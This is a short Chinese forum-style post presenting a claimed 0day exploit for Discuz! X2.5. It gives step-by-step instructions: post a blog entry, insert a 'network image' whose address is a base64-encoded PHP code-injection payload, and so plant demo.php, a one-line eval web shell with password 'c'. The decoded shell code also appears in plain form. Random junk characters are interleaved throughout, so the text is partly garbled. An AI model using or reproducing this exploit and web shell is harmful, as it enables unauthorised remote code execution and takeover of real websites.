DZ X2.5最新0day! }' b: q, J: c! Y; t: P$ }
1.注册任意账户6 V; S6 H$ c4 e1 n, k( G9 P6 L4 {
2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了
8 W, o* T& n/ n3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码
* V& y# u) S( K1 Y4 t: x# P3 @<?php @eval($_POST[c]); ?>ok
/ o3 @9 n4 b: ^+ J2 q<?fputs(fopen("dome","w"),"<?eval(\$_POST[c]);?>")?>
0 s3 {4 X$ M3 `6 {5 q( h" K4.访问日志,论坛根目录下生成demo.php,一句发密码C |